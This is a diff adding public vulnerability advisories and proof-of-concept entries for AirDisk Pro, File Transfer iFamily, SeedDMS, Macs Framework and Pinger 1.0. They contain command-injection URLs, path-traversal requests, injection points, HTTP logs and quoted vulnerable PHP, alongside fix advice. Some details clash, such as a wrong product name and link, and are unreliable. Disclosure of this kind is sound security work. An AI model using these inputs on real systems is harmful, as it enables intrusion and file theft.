diff --git a/exploits/ios/webapps/48321.txt b/exploits/ios/webapps/48321.txt new file mode 100644 index 000000000..833bae26a --- /dev/null +++ b/exploits/ios/webapps/48321.txt 
@@ -0,0 +1,417 @@ +# Title: AirDisk Pro 5.5.3 for iOS - Persistent Cross-Site Scripting +# Author: Vulnerability Laboratory +# Date: 2020-04-15 +# Vendor: http://www.app2pro.com +# Software Link: https://apps.apple.com/us/app/airdisk-pro-wireless-flash/id505904421 +# CVE: N/A + +Document Title: +=============== +AirDisk Pro v5.5.3 iOS - Multiple Persistent Vulnerabilities + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2203 + + +Release Date: +============= +2020-04-15 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2203 + + +Common Vulnerability Scoring System: +==================================== +4.5 + + +Vulnerability Class: +==================== +Cross Site Scripting - Persistent + + +Current Estimated Price: +======================== +1.000€ - 2.000€ + + +Product & Service Introduction: +=============================== +File sharing with other iOS devices via Bluetooth or Wi-Fi connection +with automatic search of nearest devices. +Users can perform file operations on the application like: Copy, Move, +Zip, Unzip, Rename, Delete, Email, and more. +Easy to create file like: Text File, New folder, Playlist, Take +Photo/Video, Import From Library, and Voice Record. +AirDisk Pro allows you to store, view and manage files on your iPhone, +iPad or iPod touch. You can connect to AirDisk +Pro from any Mac or PC over the Wi-Fi network and transfer files by drag +& drop files straight from the Finder or Windows +Explorer. AirDisk Pro features document viewer, PDF reader, music +player, image viewer, voice recorder, text editor, file +manager and support most of the file operations: like delete, move, +copy, email, share, zip, unzip and more. 
+ +(Copy of the Homepage: +https://apps.apple.com/us/app/airdisk-pro-wireless-flash/id505904421 ) +(Copy of the Homepage: http://www.app2pro.com ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered multiple +persistent web vulnerabilities in the AirDisk Pro v5.5.3 ios mobile +application. + + +Affected Product(s): +==================== +Felix Yew +Product: AirDisk Pro v5.5.3 (iOS) + + +Vulnerability Disclosure Timeline: +================================== +2020-04-15: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Authentication Type: +==================== +No authentication (guest) + + +User Interaction: +================= +Low User Interaction + + +Disclosure Type: +================ +Independent Security Research + + +Technical Details & Description: +================================ +Multiple persistent cross site scripting vulnerability has been +discovered in the official SuperBackup v2.0.5 ios mobile application. +The vulnerability allows remote attackers to inject own malicious script +codes with persistent attack vector to compromise the mobile +web-application from the application-side. + +The first vulnerability is located in the `createFolder` parameter of +the `Create Folder` function. Attackers are able to name +or rename paths via airdisk pro ui to malicious persistent script codes. +Thus allows to execute the persistent injected script +code on the front site of the path index listing in the content itself +on each refresh. The request method to inject is POST +and the attack vector is located on the application-side. Interaction to +exploit is as well possible through the unauthenticated +started ftp service on the local network. 
+ +The second vulnerability is located in the `deleteFile` parameter of the +`Delete` function. The output location with the popup +that asks for permission to delete, allows to execute the script code. +The injection point is the file parameter and the execution +point occurs in the visible delete popup with the permission question. +The request method to inject is POST and the attack vector +is located on the application-side. + +The third web vulnerability is located in the `devicename` parameter +that is displayed on the top next to the airdisk pro ui logo. +Remote attackers are able to inject own malicious persistent script code +by manipulation of the local apple devicename information. +The injection point is the devicename information and the execution +point occurs in the file sharing ui panel of the airdisk pro +mobile web-application. + +Remote attackers are able to inject own script codes to the client-side +requested vulnerable web-application parameters. The attack +vector of the vulnerability is persistent and the request method to +inject/execute is POST. The vulnerabilities are classic client-side +cross site scripting vulnerabilities. Successful exploitation of the +vulnerability results in session hijacking, persistent phishing +attacks, persistent external redirects to malicious source and +persistent manipulation of affected application modules. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] AirDisk pro Wifi UI + +Vulnerable Parameter(s): +[+] createFolder +[+] deleteFile +[+] devicename + + +Proof of Concept (PoC): +======================= +The persistent input validation web vulnerabilities can be exploited by +remote attackers with wifi access with low user interaction. +For security demonstration or to reproduce the vulnerability follow the +provided information and steps below to continue. + + +1. Create Folder + +PoC: Vulnerable Source + +
+test11 Apr 2020 at 12:35Folder +  + + + +test>" + + +PoC: Vulnerable Source (Listing - Index) + + +

Contacts 09:17:12:PM 10:Apr.:2020 .vcf

+ +

26.40 KB

+ + + + + + + + +PoC: Exception-Handling +Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020 +.vcf" +to "/Contacts >" +09:17:12:PM 10:Apr.:2020 .vcf" +- +Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020 +.vcf" +to "/Contacts 09:17:12:PM 10:Apr.:2020 >" .vcf" +- +Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020 +.vcf" +to "/Contacts >"09:17:12:PM 10:Apr.:2020 .vcf" + + +PoC: Exploit +BEGIN:VCARD +VERSION:3.0 +PRODID:-//Apple Inc.//iPhone OS 12.4.5//EN +B:Kunz Mejri ;>" ;;; +END:VCARD + + +--- PoC Session Logs [POST] --- +http://localhost/move +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 187 +Origin: http://localhost +Connection: keep-alive +Referer: http://localhost/ +oldPath=/Contacts 09:17:12:PM 10:Apr.:2020 +.vcf&newPath=/evil-filename>".vc +- +POST: HTTP/1.1 500 Internal Server Error +Content-Length: 593 +Content-Type: text/html; charset=utf-8 +Connection: Close +Server: GCDWebUploader +- +http://localhost/evil.source +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Referer: http://localhost/ +- +GET: HTTP/1.1 200 OK +Server: GCDWebUploader +Connection: Close + + +Solution - Fix & Patch: +======================= +1. Parse and filter the vcf name values next to add, edit or imports to +prevent an execution +2. 
Restrict and filter in the index listing the vcf names to sanitize +the output + + +Security Risk: +============== +The security risk of the persistent vcf cross site scripting web +vulnerability is estimated as medium. + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without +any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability +and capability for a particular purpose. Vulnerability-Lab +or its suppliers are not liable in any case of damage, including direct, +indirect, incidental, consequential loss of business profits +or special damages, even if Vulnerability-Lab or its suppliers have been +advised of the possibility of such damages. Some states do +not allow the exclusion or limitation of liability for consequential or +incidental damages so the foregoing limitation may not apply. +We do not approve or encourage anybody to break any licenses, policies, +deface websites, hack into databases or trade with stolen data. + +Domains: www.vulnerability-lab.com www.vuln-lab.com +www.vulnerability-db.com +Services: magazine.vulnerability-lab.com +paste.vulnerability-db.com infosec.vulnerability-db.com +Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab +youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php +vulnerability-lab.com/rss/rss_upcoming.php +vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php +vulnerability-lab.com/register.php +vulnerability-lab.com/list-of-bug-bounty-programs.php + +Any modified copy or reproduction, including partially usages, of this +file requires authorization from Vulnerability Laboratory. 
+Permission to electronically redistribute this alert in its unmodified +form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. +All pictures, texts, advisories, source code, videos and other +information on this website is trademark of vulnerability-lab team & the +specific authors or managers. To record, list, modify, use or +edit our material contact (admin@ or research@) to get a ask permission. + + Copyright © 2020 | Vulnerability Laboratory - [Evolution +Security GmbH]™ + + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM \ No newline at end of file diff --git a/exploits/ios/webapps/48327.txt b/exploits/ios/webapps/48327.txt new file mode 100644 index 000000000..6063109bf --- /dev/null +++ b/exploits/ios/webapps/48327.txt 
@@ -0,0 +1,245 @@ +# Title: File Transfer iFamily 2.1 - Directory Traversal +# Author: Vulnerability Laboratory +# Date: 2020-04-15 +# Software Link: http://www.dedecms.com/products/dedecms/downloads/ +# CVE: N/A + +Document Title: +=============== +File Transfer iFamily v2.1 - Directory Traversal Vulnerability + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2199 + + +Release Date: +============= +2020-04-14 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2199 + + +Common Vulnerability Scoring System: +==================================== +7.1 + + +Vulnerability Class: +==================== +Directory- or Path-Traversal + + +Current Estimated Price: +======================== +1.000€ - 2.000€ + + +Product & Service Introduction: +=============================== +Send photos, videos and documents to other devices without Internet. A +complete application to exchange files +wirelessly between devices. It uses the Multipeer Connectivity Framework +to search and connect to available devices, +without the need of internet connection or any kind of server and database. + +(Copy of the Homepage: +https://apps.apple.com/us/app/file-transfer-ifamily-files-photo-video-documents-wifi/id957971575 +) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered a directory +traversal web vulnerability in the official File Transfer iFamily v2.1 +ios mobile application. 
+ + +Affected Product(s): +==================== +DONG JOO CHO +Product: File Transfer iFamily v2.1 - iOS Mobile Web Application + + +Vulnerability Disclosure Timeline: +================================== +2020-04-14: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Authentication Type: +==================== +Pre auth - no privileges + + +User Interaction: +================= +No User Interaction + + +Disclosure Type: +================ +Independent Security Research + + +Technical Details & Description: +================================ +A directory traversal web vulnerability has been discovered in the +official File Transfer iFamily v2.1 ios mobile application. +The vulnerability allows remote attackers to change the application path +in performed requests to compromise the local application +or file-system of a mobile device. Attackers are for example able to +request environment variables or a sensitive system path. + +The directory-traversal web vulnerability is located in the main +application path request performed via GET method. Attackers are +able to request for example the local ./etc/ path of the web-server by +changing the local path in the performed request itself. +In a first request the attack changes the path, the host redirects to +complete the adress with "..". Then the attacker just +attaches a final slash to its request and the path can be accessed via +web-browser to download local files. + +Exploitation of the directory traversal web vulnerability requires no +privileged web-application user account or user interaction. +Successful exploitation of the vulnerability results in information +leaking by unauthorized file access and mobile application compromise. 
+ + +Proof of Concept (PoC): +======================= +The directory traversal vulnerability can be exploited by attackers with +access to the wifi interface in a local network without user interaction. +For security demonstration or to reproduce the security vulnerability +follow the provided information and steps below to continue. + + +PoC: Exploitation +http://localhost/../../../../../../../../../../../../../../../../../../../../../../ +http://localhost//../ + + +--- PoC Session Logs [GET]] --- +http://localhost/../../../../../../../../../../../../../../../../../../../../../../ +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +- +GET: HTTP/1.1 200 OK +Accept-Ranges: bytes +Content-Length: 2521 +- +http://localhost../etc/ +Host: localhost.. 
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +- add slash to correct host adress (/.././) +http://localhost/./ +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +- Access granted +http://localhost/../../../../../../../../../../../../../../../../../../../../../../ +GET: HTTP/1.1 200 OK +Accept-Ranges: bytes +Content-Length: 2521 + + +Solution - Fix & Patch: +======================= +The vulnerability can be patched by a restriction of the visible and +accessable ./etc/ path in the app container. +Disallow path changes in the client-side get method requests and +validate them securely. + + +Security Risk: +============== +The security risk of the directory travsersal web vulnerability in the +ios mobile application is estimated as high. + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without +any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability +and capability for a particular purpose. 
Vulnerability-Lab +or its suppliers are not liable in any case of damage, including direct, +indirect, incidental, consequential loss of business profits +or special damages, even if Vulnerability-Lab or its suppliers have been +advised of the possibility of such damages. Some states do +not allow the exclusion or limitation of liability for consequential or +incidental damages so the foregoing limitation may not apply. +We do not approve or encourage anybody to break any licenses, policies, +deface websites, hack into databases or trade with stolen data. + +Domains: www.vulnerability-lab.com www.vuln-lab.com +www.vulnerability-db.com +Services: magazine.vulnerability-lab.com +paste.vulnerability-db.com infosec.vulnerability-db.com +Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab +youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php +vulnerability-lab.com/rss/rss_upcoming.php +vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php +vulnerability-lab.com/register.php +vulnerability-lab.com/list-of-bug-bounty-programs.php + +Any modified copy or reproduction, including partially usages, of this +file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified +form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. +All pictures, texts, advisories, source code, videos and other +information on this website is trademark of vulnerability-lab team & the +specific authors or managers. To record, list, modify, use or +edit our material contact (admin@ or research@) to get a ask permission. + + Copyright © 2020 | Vulnerability Laboratory - [Evolution +Security GmbH]™ \ No newline at end of file diff --git a/exploits/php/webapps/48323.txt b/exploits/php/webapps/48323.txt new file mode 100644 index 000000000..e6038c894 --- /dev/null +++ b/exploits/php/webapps/48323.txt 
@@ -0,0 +1,75 @@ +# Title: Pinger 1.0 - Remote Code Execution +# Date: 2020-04-13 +# Author: Milad Karimi +# Vendor Homepage: https://github.com/wcchandler/pinger +# Software Link: https://github.com/wcchandler/pinger +# Tested on: windows 10 , firefox +# Version: 1.0 +# CVE : N/A + +================================================================================ +Pinger 1.0 - Simple Pinging Webapp Remote Code Execution +================================================================================ +# Vendor Homepage: https://github.com/wcchandler/pinger +# Software Link: https://github.com/wcchandler/pinger +# Date: 2020.04.13 +# Author: Milad Karimi +# Tested on: windows 10 , firefox +# Version: 1.0 +# CVE : N/A +================================================================================ +# Description: +simple, easy to use jQuery frontend to php backend that pings various +devices and changes colors from green to red depending on if device is +up or down. + +# PoC : + +http://localhost/pinger/ping.php?ping=;echo '' >info.php +http://localhost/pinger/ping.php?socket=;echo '' >info.php + + +# Vulnerabile code: + + if(isset($_GET['ping'])){ + // if this is ever noticably slower, i'll pass it stuff when called + // change the good.xml to config.xml, good is what I use at $WORK + $xml = simplexml_load_file("config.xml"); + //$xml = simplexml_load_file("good.xml"); + if($_GET['ping'] == ""){ + $host = "127.0.0.1"; + }else{ + $host = $_GET['ping']; + } + $out = trim(shell_exec('ping -n -q -c 1 -w '.$xml->backend->timeout + .' '.$host.' 
| grep received | awk \'{print $4}\'')); + $id = str_replace('.','_',$host); + + if(($out == "1") || ($out == "0")){ + echo json_encode(array("id"=>"h$id","res"=>"$out")); + }else{ + ## if it returns nothing, assume network is messed up + echo json_encode(array("id"=>"h$id","res"=>"0")); + } + } + + if(isset($_GET['socket'])){ + $xml = simplexml_load_file("config.xml"); + //$xml = simplexml_load_file("good.xml"); + if($_GET['socket'] == ""){ + $host = "127.0.0.1 80"; + }else{ + $host = str_replace(':',' ',$_GET['socket']); + } + $out = shell_exec('nc -v -z -w '.$xml->backend->timeout.' '.$host.' 2>&1'); + $id = str_replace('.','_',$host); + $id = str_replace(' ','_',$id); + if(preg_match("/succeeded/",$out)){ + echo json_encode(array("id"=>"h$id","res"=>"1")); + }else{ + ## if it returns nothing, assume network is messed up + echo json_encode(array("id"=>"h$id","res"=>"0")); + } + } + + ?> \ No newline at end of file diff --git a/exploits/php/webapps/48324.txt b/exploits/php/webapps/48324.txt new file mode 100644 index 000000000..b44c3167f --- /dev/null +++ b/exploits/php/webapps/48324.txt 
@@ -0,0 +1,352 @@ +# Title: SeedDMS 5.1.18 - Persistent Cross-Site Scripting +# Author: Vulnerability Laboratory +# Date: 2020-04-15 +# Vendor: https://www.seeddms.org +# Software Link: https://www.seeddms.org/index.php?id=7 +# CVE: N/A + +Document Title: +=============== +SeedDMS v5.1.18 - Multiple Persistent Web Vulnerabilities + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2209 + + +Release Date: +============= +2020-04-15 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2209 + + +Common Vulnerability Scoring System: +==================================== +4.3 + + +Vulnerability Class: +==================== +Cross Site Scripting - Persistent + + +Current Estimated Price: +======================== +1.000€ - 2.000€ + + +Product & Service Introduction: +=============================== +SeedDMS is a free document management system with an easy to use web +based user interface. It is based on PHP and +MySQL or sqlite3 and runs on Linux, MacOS and Windows. Many years of +development has made it a mature, powerful +and enterprise ready platform for sharing and storing documents. It's +fully compatible with its predecessor LetoDMS. + +(Copy of the Homepage: https://www.seeddms.org/index.php?id=2 & +https://www.seeddms.org/index.php?id=7 ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered multiple +persistent vulnerabilities in the SeedDMS v5.1.16 & v5.1.18 web-application. 
+ + +Affected Product(s): +==================== +Uwe Steinmann +Product: SeedDMS - Content Management System v4.3.37, v5.0.13, v5.1.14, +v5.1.16, v5.1.18 and v6.0.7 + + +Vulnerability Disclosure Timeline: +================================== +2020-04-15: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Authentication Type: +==================== +Restricted authentication (user/moderator) - User privileges + + +User Interaction: +================= +Low User Interaction + + +Disclosure Type: +================ +Independent Security Research + + +Technical Details & Description: +================================ +Multiple persistent cross site web vulnerabilities has been discovered +in the SeedDMS v4.3.37, v5.0.13, v5.1.14 and v6.0.7 web-application. +The vulnerability allows remote attackers to inject own malicious script +codes with persistent attack vector to compromise browser to +web-application requests from the application-side. + +The persistent cross site scripting web vulnerabilities are located in +the `name` and `comment` parameter of the `AddEvent.php` file. +Remote attackers are able to add an own event via op.AddEvent with +malicious script codes. The request method to inject is POST +and the attack vector is located on the application-side. After the +inject the execution occurs in the admin panel within the +`Log Management` - `Webdav` and `Web` on view. The content of the +comment and name is unescaped pushed inside of the logs with +a html/js template. Thus allows an attacker to remotly exploit the issue +by a simple post inject from outside with lower privileges. 
+ +Successful exploitation of the vulnerability results in session +hijacking, persistent phishing attacks, persistent external redirects +to malicious source and persistent manipulation of affected or connected +application modules. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] op.AddEvent (AddEvent.php) + +Vulnerable Parameter(s): +[+] name +[+] comment + +Affected Module(s): +[+] Log Management (out.LogManagement.php) + + +Proof of Concept (PoC): +======================= +The persistent web vulnerability can be exploited by remote attackers +with low privileged web-application user account and low user interaction. +For security demonstration or to reproduce the security web +vulnerability follow the provided information and steps below to continue. + + +Manual steps to reproduce the vulnerability ... +1. Start your local webbrowser and tamper the http protocol session +2. Open the AddEvent.php and add a new event +3. Insert your script code test payload inside the Name or Comments path +4. Save or submit the entry with error +Note: Now the web and webdav log has captured the insert or erro +5. Now wait until the administrator previews in the log management the +web or webdav view function +6. Successful reproduce of the persistent web vulnerability! + + +PoC: Vulnerable Source (Log Management - View) +
Apr 13 19:23:22  [info] admin (localhost) op.RemoveLog
+?logname=20200413.log
+Apr 13 19:29:53  [info] admin (localhost) op.AddEvent ?name="
+&comment=&from=1586728800&to=1586815199
+
+ + +PoC: Payload +>" + + +--- PoC Session Logs (POST) --- +https://SeedDMS.localhost:8080/out/out.AddEvent.php +Host: SeedDMS.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Connection: keep-alive +Referer: https://SeedDMS.localhost:8080/out/out.Calendar.php?mode=y +Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312 +- +GET: HTTP/1.1 200 OK +Server: Apache/2.4.25 (Debian) +Vary: Accept-Encoding +Content-Encoding: gzip +Content-Length: 2973 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +- +https://SeedDMS.localhost:8080/op/op.AddEvent.php +Host: SeedDMS.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Content-Type: application/x-www-form-urlencoded +Content-Length: 356 +Origin: https://SeedDMS.localhost:8080 +Connection: keep-alive +Referer: https://SeedDMS.localhost:8080/out/out.AddEvent.php +Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312 +from=2020-04-13&to=2020-04-13 +&name=>"&comment=>" +- +POST: HTTP/1.1 302 Found +Server: Apache/2.4.25 (Debian) +Location: ../out/out.Calendar.php?mode=w&day=13&year=2020&month=04 +Content-Length: 0 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +Note: Injection Point via Calender op.AddEvent Name & Comment + + + +--- PoC Session Logs (GET) --- +https://SeedDMS.localhost:8080/out/out.LogManagement.php?logname=20200413.log +Host: SeedDMS.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: text/html, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, 
deflate, br +X-Requested-With: XMLHttpRequest +Connection: keep-alive +Referer: https://SeedDMS.localhost:8080/out/out.LogManagement.php +Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312 +- +GET: HTTP/1.1 200 OK +Server: Apache/2.4.25 (Debian) +Vary: Accept-Encoding +Content-Encoding: gzip +Content-Length: 273 +Keep-Alive: timeout=5, max=94 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 +- +https://SeedDMS.localhost:8080/out/evil.source +Host: SeedDMS.localhost:8080 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate, br +Connection: keep-alive +Referer: https://SeedDMS.localhost:8080/out/out.LogManagement.php +Cookie: mydms_session=b0496ccee96aa571a3ca486b8738c312 +Upgrade-Insecure-Requests: 1 +- +GET: HTTP/1.1 302 Found +Server: Apache/2.4.25 (Debian) +Location: /out/out.ViewFolder.php +Content-Length: 0 +Keep-Alive: timeout=5, max=93 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 + +Note: Execution Point via Log Management (AP) on Webdav View or Web View + + + +Reference(s): +https://SeedDMS.localhost:8080/ +https://SeedDMS.localhost:8080/op/op.AddEvent.php +https://SeedDMS.localhost:8080/out/out.ViewFolder.php +https://SeedDMS.localhost:8080/out/out.AddEvent.php +https://SeedDMS.localhost:8080/out/out.LogManagement.php +https://SeedDMS.localhost:8080/out/out.Calendar.php?mode= +https://SeedDMS.localhost:8080/out/out.LogManagement.php?logname= + + +Solution - Fix & Patch: +======================= +1. Parse and escape the name and comment input field on transmit to sanitize +2. Filter and restrict the input field of the name and comments +parameter for special chars to prevent injects +3. 
Parse the output location of all web and webdav logfiles to prevent +the execution point + + +Security Risk: +============== +The security risk of the persistent cross site web vulnerabilities in +the seeddms web-application are estimated as medium. + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without +any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability +and capability for a particular purpose. Vulnerability-Lab +or its suppliers are not liable in any case of damage, including direct, +indirect, incidental, consequential loss of business profits +or special damages, even if Vulnerability-Lab or its suppliers have been +advised of the possibility of such damages. Some states do +not allow the exclusion or limitation of liability for consequential or +incidental damages so the foregoing limitation may not apply. +We do not approve or encourage anybody to break any licenses, policies, +deface websites, hack into databases or trade with stolen data. 
+ +Domains: www.vulnerability-lab.com www.vuln-lab.com +www.vulnerability-db.com +Services: magazine.vulnerability-lab.com +paste.vulnerability-db.com infosec.vulnerability-db.com +Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab +youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php +vulnerability-lab.com/rss/rss_upcoming.php +vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php +vulnerability-lab.com/register.php +vulnerability-lab.com/list-of-bug-bounty-programs.php + +Any modified copy or reproduction, including partially usages, of this +file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified +form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. +All pictures, texts, advisories, source code, videos and other +information on this website is trademark of vulnerability-lab team & the +specific authors or managers. To record, list, modify, use or +edit our material contact (admin@ or research@) to get a ask permission. + + Copyright © 2020 | Vulnerability Laboratory - [Evolution +Security GmbH]™ + + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM \ No newline at end of file diff --git a/exploits/php/webapps/48325.txt b/exploits/php/webapps/48325.txt new file mode 100644 index 000000000..0cb46c90a --- /dev/null +++ b/exploits/php/webapps/48325.txt 
@@ -0,0 +1,482 @@ +# Title: Macs Framework 1.14f CMS - Persistent Cross-Site Scripting +# Author: Vulnerability Laboratory +# Date: 2020-04-15 +# Software Link: https://sourceforge.net/projects/macs-framework/files/latest/download +# CVE: N/A + +Document Title: +=============== +Macs Framework v1.14f CMS - Multiple Web Vulnerabilities + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2206 + + +Release Date: +============= +2020-04-14 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2206 + + +Common Vulnerability Scoring System: +==================================== +7.4 + + +Vulnerability Class: +==================== +Multiple + + +Current Estimated Price: +======================== +1.000€ - 2.000€ + + +Product & Service Introduction: +=============================== +Macs CMS is a Flat File (XML and SQLite) based AJAX Content Management +System. It focuses mainly on the +Edit In Place editing concept. It comes with a built in blog with +moderation support, user manager section, +roles manager section, SEO / SEF URL. +https://sourceforge.net/projects/macs-framework/files/latest/download + +(Copy of the Homepage: https://sourceforge.net/projects/macs-framework/ ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered multiple web +vulnerabilities in the official Macs Framework v1.1.4f CMS. 
+ + +Affected Product(s): +==================== +Macrob7 +Product: Macs Framework v1.14f - Content Management System + + +Vulnerability Disclosure Timeline: +================================== +2020-04-14: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Authentication Type: +==================== +Restricted authentication (user/moderator) - User privileges + + +User Interaction: +================= +Low User Interaction + + +Disclosure Type: +================ +Independent Security Research + + +Technical Details & Description: +================================ +1.1 & 1.2 +Multiple non-persistent cross site scripting web vulnerabilities has +been discovered in the official Mac Framework v1.1.4f Content Managament +System. +The vulnerability allows remote attackers to manipulate client-side +browser to web-applicatio requests to compromise user sesson credentials +or to +manipulate module content. + +The first vulnerability is located in the search input field of the +search module. Remote attackers are able to inject own malicious script +code as +search entry to execute the code within the results page that is loaded +shortly after the request is performed. The request method to inject is +POST +and the attack vector is located on the client-side with non-persistent +attack vector. + +The second vulnerability is located in the email input field of the +account reset function. Remote attackers are able to inject own +malicious script code as +email to reset the passwort to execute the code within performed +request. The request method to inject is POST and the attack vector is +located on the +client-side with non-persistent attack vector. 
+ +Successful exploitation of the vulnerabilities results in session +hijacking, non-persistent phishing attacks, non-persistent external +redirects to +malicious source and non-persistent manipulation of affected or +connected application modules. + +Request Method(s): +[+] POST + +Vulnerable Parameter(s): +[+] searchString +[+] emailAdress + + +1.3 +Multiple remote sql-injection web vulnerabilities has been discovered in +the official Mac Framework v1.1.4f Content Managament System. +The vulnerability allows remote attackers to inject or execute own sql +commands to compromise the dbms or file system of the application. + +The sql injection vulnerabilities are located in the `roleId` and +`userId` of the `editRole` and `deletUser` module. The request method to +inject or execute commands is GET and the attack vector is located on +the application-side. Attackers with privileged accounts to edit are +able to inject own sql queries via roleid and userid on deleteUser or +editRole. Multiple unhandled and broken sql queries are visible as default +debug to output for users as well. + +Exploitation of the remote sql injection vulnerability requires no user +interaction and a privileged web-application user account. +Successful exploitation of the remote sql injection results in database 